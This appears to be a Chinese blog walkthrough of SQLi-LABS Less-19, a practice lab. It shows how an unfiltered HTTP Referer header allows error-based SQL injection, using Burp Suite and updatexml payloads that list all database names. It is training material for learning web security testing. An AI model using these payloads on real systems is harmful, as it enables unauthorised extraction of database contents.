第19关使用POST请求提交参数,后端对用户名和密码进行了特殊字符转译,难度较大源码如下

但后面插入HTTP Referer时,并没有对参数进行过滤,我们可以从Referer入手

首先,输入正确的账号和密码,只有账号和密码都正确,才能操作Referer

然后使用代理软件(Burp Suite)拦截POST请求,修改Referer的参数,页面出现了报错信息,接下来即可使用报错注入进行脱库

1' and updatexml(1,0x7e,1) and '

获取所有数据库

1' and updatexml(1,concat(0x7e,substr(
(select group_concat(schema_name)
from information_schema.schemata)
,1,31)),3) and '

SQLi LABS Less-19相关推荐

  1. SQLi LABS Less 27a 联合注入+布尔盲注+时间盲注

    第27a关是双引号字符型注入: 过滤了注释(/* -- #),关键字(select union),空格: 这篇文章提供联合注入.布尔盲注.时间盲注三种解题方式. 其他 SQLi LABS 靶场的解题步 ...

  2. SQLi LABS Less 27 联合注入+报错注入+布尔盲注+时间盲注

    第27关是单引号字符型注入: 过滤了注释(/* -- #),关键字(select union),空格: 这篇文章提供联合注入.报错注入.布尔盲注.时间盲注四种解题方式. 其他 SQLi LABS 靶场 ...

  3. SQLi LABS Less 26a 联合注入+布尔盲注

    第26a关是单引号+括号的字符型注入: 后台过滤了关键字( and  or ),注释(/*  #  --  /),空格: 这篇文章提供联合注入.布尔盲注.两种解题方式. SQLi LABS其他关卡可以 ...

  4. SQLi LABS Less 25 联合注入+报错注入+布尔盲注

    第二十五关单引号字符型注入: 过滤了关键字(and.or),可以使用双写绕过: 这篇文章提供了联合注入.报错注入.布尔盲注三种解题方法. SQLi LABS 其余关卡可参考我的专栏:SQLi-LABS ...

  5. sqli——labs初学者通关详

    目录 Less-1 GET-Error based-Single quotes-String(基于错误的GET单引号字符型注入) Less-2 GET-Error based- Intiger bas ...

  6. SQLi LABS Less-8 布尔盲注

    「作者主页」:士别三日wyx 「作者简介」:CSDN top200.阿里云博客专家.华为云享专家.网络安全领域优质创作者 第八关是单引号字符型注入,推荐使用布尔盲注 方式一:布尔盲注 第一步.判断注入 ...

  7. SQLi LABS Less-31

    第31关的源码中并未对参数做过多的过滤,只是在参数两边拼接了双引号和括号 在url地址栏中输入 1") and true-- a,使SQL恒成立,页面正常显示 再输入 1") an ...

  8. SQLi LABS Less-30

    第30关使用GET请求传递参数,在url中构造payload即可 后端源码中并没有做什么过滤,只是在参数两边添加了双引号 输入 1" and true-- a,页面正常显示 输入 1&quo ...

  9. SQLi LABS Less-29

    第29关使用GET请求提交参数,在url中构造payload即可 源码中并没有做什么过滤,直接测试注入点即可 在url中输入 1'and true-- a,源码中的SQL会拼接成下面这样 注释后面的内 ...

最新文章

  1. 08JavaScript中的函数
  2. android actionbaractivity 错误,Android studio无法解析ActionBarActivity
  3. [转]掌握Ajax 第 2 部分: 使用 JavaScript 和 Ajax 发出异步请求 [IBM]
  4. html+li标签+高度,有时在使用Jquery插入LI元素时,JavaScript不会调整UL元素的高度
  5. 48. Rotate Image
  6. 单线程实现检索当当网泄露的1GB用户数据
  7. POJ - 2187 Beauty Contest(最远点对)
  8. 浅尝JQ AJAX
  9. WebDriver API 实例详解(二)
  10. HADOOP生态圈知识概述
  11. mongodb聚合内存不足解决方案
  12. 通信网理论与应用第1章 通信网概述
  13. 动态生成WebService的客户端
  14. 电脑文件分区壁纸--超级马里奥、樱桃小丸子主题
  15. 【PSFTP】Windows从Linux获取文件或目录
  16. 模糊控制(一)模糊控制简介及数学基础
  17. mysql死锁的例子_GitHub - yxp199249/mysql-deadlocks: 收集一些常见的 MySQL 死锁案例
  18. 计算机走技术路线发展,硬件测试工程师发展前景_计算机硬件测试工程师_硬件测试工程师职责...
  19. spring-kafka广播模式配置_小学校园智能广播系统方案(定压广播)
  20. 用旧平板打造家庭云数码相框

热门文章

  1. async/await处理异步
  2. 2018 ACM-ICPC World Finals - Beijing F.Go with the Flow
  3. 【Android界面实现】Drawable Animation 使用介绍
  4. 多校#5-1005-Instring-HDU5785-manacher+维护
  5. .net连接ORACLE数据库
  6. 各浏览器中的鼠标滚轮事件处理
  7. js detect the type of device
  8. 技术圈儿007---Redis 生产架构选型解决方案
  9. k8s核心技术-Pod(镜像的拉取_重启策略_资源限制)_---K8S_Google工作笔记0022
  10. IntelliJ Idea学习笔记008---Idea左侧栏不显示目录结构_或者只显示一个Project不显示其他东西